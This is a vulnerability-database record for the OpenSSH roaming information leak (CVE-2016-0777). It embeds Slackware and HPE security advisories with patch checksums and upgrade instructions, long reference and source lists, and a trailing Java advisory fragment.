-current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.1p2-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n856dd9c1b10641c282f30a34b7b63bea openssh-7.1p2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n80903b0829f0284d007e7a316f2ff2da openssh-7.1p2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n2095d1a304a94bab44993fdb7e0781c8 openssh-7.1p2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n5bf653d7f5b4a9426ff2c5888af99f00 openssh-7.1p2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n53e09b4371c045b9de1c86e0826324f9 openssh-7.1p2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\ncd0319ff3c574c50612d5ba2b38f2fdc openssh-7.1p2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n98cdc1d6ffea2a06d0c8013078681bff openssh-7.1p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n2093f3e91a79e07f072c702a1704be73 openssh-7.1p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nd051d9f31cd380436ad01fa1641be1c7 openssh-7.1p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nf1f81757431c3c836f06ce5d22e2d5de openssh-7.1p2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n70db20c5e4152bc9967b1e24cf91ed98 n/openssh-7.1p2-i586-1.txz\n\nSlackware x86_64 -current package:\ne13dc3da27f817bee693fbb907015817 n/openssh-7.1p2-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg openssh-7.1p2-i486-1_slack14.1.txz\n\nNext, restart the sshd daemon:\n# sh /etc/rc.d/rc.sshd restart\n\nThen before logging out, make sure that you still have remote access!\nSee the information about incompatible changes in OpenSSH 7.x above. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niEYEARECAAYFAlaYWioACgkQakRjwEAQIjOwpACfXviFRy4mQxr63HyYu9zLgZ+Z\ndVsAn0sLTJYcXuCSQYnXNp+FYuIKWjVh\n=dePf\n-----END PGP SIGNATURE-----\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05247375\nVersion: 1\n\nHPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System\n(vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information,\nRemote Denial of Service (DoS), Remote Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-08-29\nLast Updated: 2016-08-29\n\nPotential Security Impact: Remote Denial of Service (DoS), Disclosure of\nInformation, Unauthorized Modification Of Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in the lighttpd and OpenSSH\nversion used in HPE Remote Device Access: Virtual Customer Access System\n(vCAS). These vulnerabilities could be exploited remotely resulting in\nunauthorized modification of information, denial of service (DoS), and\ndisclosure of information. \n\nReferences:\n\nCVE-2015-3200\nCVE-2016-0777\nCVE-2016-0778\nPSRT110211\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHPE Remote Device Access: Virtual Customer Access System (vCAS) - v15.07 (RDA\n8.1) and earlier. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2015-3200\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n CVE-2016-0777\n 6.5 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)\n\n CVE-2016-0778\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following updates available to resolve the vulnerabilities\nin Remote Device Access: Virtual Customer Access System (vCAS)\n\nvCAS 16.05 (RDA 8.7) kits - hp-rdacas-16.05-10482-vbox.ova and\nhp-rdacas-16.05-10482.ova. \n\nThe Oracle VirtualBox kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova\n\nThe VMware ESX(i) and VMware Player kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova\n\nHISTORY\nVersion:1 (rev.1) - 29 August 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners", "sources": [ { "db": "NVD", "id": "CVE-2016-0777" }, { "db": "CERT/CC", "id": "VU#456088" }, { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" }, { "db": "VULHUB", "id": "VHN-88287" }, { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" } ], "trust": 2.7 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-88287", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-88287" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0777", "trust": 3.6 }, { "db": "JUNIPER", "id": "JSA10734", "trust": 2.4 }, { "db": "BID", "id": "80695", "trust": 2.1 }, { "db": "PACKETSTORM", "id": "135273", "trust": 1.9 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/01/14/7", "trust": 1.8 }, { "db": "SECTRACK", "id": "1034671", "trust": 1.8 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.8 }, { "db": "CERT/CC", "id": "VU#456088", "trust": 1.5 }, { "db": "CNNVD", "id": "CNNVD-201601-249", "trust": 0.7 }, { "db": "JUNIPER", "id": "JSA10774", "trust": 0.6 }, { "db": "BID", "id": "80698", "trust": 0.3 }, { "db": "PACKETSTORM", "id": "135282", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "135259", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "135283", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135250", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135281", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135263", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-88287", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-0777", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138552", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88287" }, { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "CNNVD", "id": "CNNVD-201601-249" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "id": "VAR-201601-0029", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-88287" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T19:54:41.157000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "OpenSSH Security vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=59596" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/05/05/juniper_patches_opensshs_roaming_bug_in_junos_os/" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/01/14/openssh_is_wide_open_to_key_theft_thanks_to_roaming_flaw/" }, { "title": "Ubuntu Security Notice: openssh vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2869-1" }, { "title": "Debian CVElist Bug Report Logs: openssh-client: CVE-2016-0777", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5382b188b84b87a2670c7f1e661e15b8" }, { "title": "Debian Security Advisories: DSA-3446-1 openssh -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ae57bf01ef5062fb12be694f4a95eb69" }, { "title": "Red Hat: CVE-2016-0777", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-0777" }, { "title": "Amazon Linux AMI: ALAS-2016-638", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-638" }, { "title": "Symantec Security Advisories: SA109 : Multiple OpenSSH Vulnerabilities (January 2016)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=ef164fe57ef1d1217ba2dc664dcecce2" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83" }, { "title": "sshtron", "trust": 0.1, "url": "https://github.com/zachlatta/sshtron " }, { "title": "repassh", "trust": 0.1, "url": "https://github.com/dyuri/repassh " }, { "title": "docker-sshtron", "trust": 0.1, "url": "https://github.com/jaymoulin/docker-sshtron " }, { "title": "sshtron", "trust": 0.1, "url": "https://github.com/marcospedreiro/sshtron " }, { "title": "Linux_command_crash_course", "trust": 0.1, "url": "https://github.com/akshayprasad/linux_command_crash_course " }, { "title": "gameserverB", "trust": 0.1, "url": "https://github.com/jcdad3000/gameserverb " }, { "title": "GameServer", "trust": 0.1, "url": "https://github.com/jcdad3000/gameserver " }, { "title": "fabric2", "trust": 0.1, "url": "https://github.com/winstonn/fabric2 " }, { "title": "", "trust": 0.1, "url": "https://github.com/cpcloudnl/ssh-config " }, { "title": "puppet-module-ssh", "trust": 0.1, "url": "https://github.com/ghoneycutt/puppet-module-ssh " }, { "title": "nmap", "trust": 0.1, "url": "https://github.com/project7io/nmap " }, { "title": "DC-2-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough " }, { "title": "DC-1-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough " }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "CNNVD", "id": "CNNVD-201601-249" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88287" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "http://www.openssh.com/txt/release-7.1p2" }, { "trust": 2.4, "url": "http://www.securityfocus.com/bid/80695" }, { "trust": 2.4, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "trust": 2.4, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "trust": 2.4, "url": "http://www.debian.org/security/2016/dsa-3446" }, { "trust": 2.4, "url": "http://packetstormsecurity.com/files/135273/qualys-security-advisory-openssh-overflow-leak.html" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "trust": 1.8, "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "trust": 1.8, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05247375" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "trust": 1.8, "url": "https://support.apple.com/ht206167" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/176516.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176349.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/175592.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/175676.html" }, { "trust": 1.8, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:07.openssh.asc" }, { "trust": 1.8, "url": "http://seclists.org/fulldisclosure/2016/jan/44" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201601-01" }, { "trust": 1.8, "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1034671" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2869-1" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734" }, { "trust": 1.5, "url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt" }, { "trust": 1.4, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.7/common/022_ssh.patch.sig" }, { "trust": 1.4, "url": "http://www.ubuntu.com/usn/usn-2869-1/" }, { "trust": 0.9, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0777" }, { "trust": 0.8, "url": "http://undeadly.org/cgi?action=article\u0026sid=20160114142733" }, { "trust": 0.8, "url": "https://github.com/openssh/openssh-portable/blob/8408218c1ca88cb17d15278174a24a94a6f65fe1/roaming_client.c#l70" }, { "trust": 0.8, "url": "https://isc.sans.edu/forums/diary/openssh+71p2+released+with+security+fix+for+cve20160777/20613/" }, { "trust": 0.8, "url": "https://access.redhat.com/articles/2123781" }, { "trust": 0.8, "url": "https://security-tracker.debian.org/tracker/cve-2016-0778" }, { "trust": 0.7, "url": "https://www.kb.cert.org/vuls/id/456088" }, { "trust": 0.7, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375" }, { "trust": 0.6, "url": "http://www.openssh.com" }, { "trust": 0.6, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.6, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss" }, { "trust": 0.6, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.8/common/010_ssh.patch.sig" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023271" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023319" }, { "trust": 0.6, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021138" }, { "trust": 0.6, "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory7.asc" }, { "trust": 0.6, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/44" }, { "trust": 0.6, "url": "https://rhn.redhat.com/errata/rhsa-2016-0043.html" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978487" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000044" }, { "trust": 0.6, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-001-openssh" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021109" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777" }, { "trust": 0.3, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:07.openssh.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975158" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10734" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/200.html" }, { "trust": 0.1, "url": "https://github.com/zachlatta/sshtron" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/msc06-c.+beware+of+compiler+optimizations" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/14.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem06-c.+ensure+that+sensitive+data+is+not+written+out+to+disk" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/244.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem03-c.+clear+sensitive+information+stored+in+reusable+resources" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.openssh.com/legacy.html" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0778" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3200" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88287" }, { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "CNNVD", "id": "CNNVD-201601-249" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88287" }, { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "CNNVD", "id": "CNNVD-201601-249" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-14T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2016-01-14T00:00:00", "db": "VULHUB", "id": "VHN-88287" }, { "date": "2016-01-14T00:00:00", "db": "VULMON", "id": "CVE-2016-0777" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80698" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80695" }, { "date": "2016-01-15T02:09:54", "db": "PACKETSTORM", "id": "135273" }, { "date": "2016-01-15T00:03:14", "db": "PACKETSTORM", "id": "135259" }, { "date": "2016-01-15T13:35:04", "db": "PACKETSTORM", "id": "135282" }, { "date": "2016-08-30T14:19:12", "db": "PACKETSTORM", "id": "138552" }, { "date": "2016-01-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-249" }, { "date": "2016-01-14T22:59:01.140000", "db": "NVD", "id": "CVE-2016-0777" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-20T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2022-12-13T00:00:00", "db": "VULHUB", "id": "VHN-88287" }, { "date": "2022-12-13T00:00:00", "db": "VULMON", "id": "CVE-2016-0777" }, { "date": "2017-01-23T03:06:00", "db": "BID", "id": "80698" }, { "date": "2017-01-23T04:05:00", "db": "BID", "id": "80695" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-249" }, { "date": "2022-12-13T12:15:18.887000", "db": "NVD", "id": "CVE-2016-0777" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138552" }, { "db": "CNNVD", "id": "CNNVD-201601-249" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSH Client contains a client information leak vulnerability and buffer overflow", "sources": [ { "db": "CERT/CC", "id": "VU#456088" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-249" } ], "trust": 0.6 } }
var-201310-0372
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Libraries. The vulnerability can be exploited over multiple protocols. This issue affects the 'Libraries' sub-component. In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets.
This updates IcedTea6 to version 1.11.14, which fixes these issues, as well as several others. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFSiycxmqjQ0CJFipgRAgEDAKDflCdAJCTeaiQlfwCT2ypkKWxMAQCguZqZ JVNYykKzXuNiMTc7JATPYjA= =20DS -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2013-10-15-1 Java for OS X 2013-005 and Mac OS X v10.6 Update 17
Java for OS X 2013-005 and Mac OS X v10.6 Update 17 is now available and addresses the following:
Java Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 or later, OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later Impact: Multiple vulnerabilities in Java 1.6.0_51 Description: 8011782 Multiple vulnerabilities existed in Java 1.6.0_51, the most serious of which may allow an untrusted Java applet to execute arbitrary code outside the Java sandbox. Further information is available via the Java website at ht tp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html CVE-ID CVE-2013-3829 CVE-2013-4002 CVE-2013-5772 CVE-2013-5774 CVE-2013-5776 CVE-2013-5778 CVE-2013-5780 CVE-2013-5782 CVE-2013-5783 CVE-2013-5784 CVE-2013-5787 CVE-2013-5789 CVE-2013-5790 CVE-2013-5797 CVE-2013-5801 CVE-2013-5802 CVE-2013-5803 CVE-2013-5804 CVE-2013-5809 CVE-2013-5812 CVE-2013-5814 CVE-2013-5817 CVE-2013-5818 CVE-2013-5819 CVE-2013-5820 CVE-2013-5823 CVE-2013-5824 CVE-2013-5825 CVE-2013-5829 CVE-2013-5830 CVE-2013-5831 CVE-2013-5832 CVE-2013-5840 CVE-2013-5842 CVE-2013-5843 CVE-2013-5848 CVE-2013-5849 CVE-2013-5850
Java for OS X 2013-005 and Mac OS X v10.6 Update 17 may be obtained from the Software Update pane in System Preferences, Mac App Store, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
